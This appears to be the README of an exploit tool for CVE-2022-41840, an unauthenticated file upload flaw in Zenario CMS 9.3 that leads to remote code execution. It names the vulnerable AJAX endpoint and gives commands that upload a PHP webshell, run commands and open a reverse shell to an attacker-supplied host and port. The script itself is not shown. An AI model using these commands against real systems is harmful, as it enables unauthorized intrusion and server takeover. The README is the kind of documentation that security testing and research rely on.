# Zenario CMS 9.3 - Unauthenticated RCE Exploit

## CVE-2022-41840

An unauthenticated remote code execution (RCE) vulnerability affecting Zenario CMS version 9.3 and earlier. The exploit leverages a file upload vulnerability in the AJAX endpoint to upload a PHP webshell and achieve code execution.

## Vulnerability Details

- **CVE**: CVE-2022-41840
- **Affected Version**: Zenario CMS <= 9.3
- **Vulnerability Type**: Unauthenticated File Upload leading to RCE
- **Attack Vector**: HTTP POST to `/zenario/ajax.php`
- **Required Privileges**: None (unauthenticated)

## Usage

### Interactive Webshell

```bash
python3 zenario_exploit.py --target http://target.com
```

### Single Command Execution

```bash
python3 zenario_exploit.py --target http://target.com --cmd "id"
```

### Reverse Shell

```bash
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
```

## Requirements

- Python 3.x
- `requests` library

Install dependencies:

```bash
pip install requests
```

## Features

- Automatic PHP webshell upload via vulnerable AJAX endpoint
- Support for multiple instanceId values for increased success rate
- JSON and regex-based path extraction
- Multiple reverse shell payload options (bash, python, perl, nc)
- Fully interactive PTY shell with terminal support
- Webshell fallback if reverse shell fails

## Disclaimer

**For educational and authorized security testing purposes only.** 

This tool is provided for security researchers and penetration testers to test systems they own or have explicit authorization to test. Unauthorized access to computer systems is illegal and strictly prohibited.

The maintainers assume no liability for any misuse or damage caused by this tool.

## License

This code is provided for educational purposes.

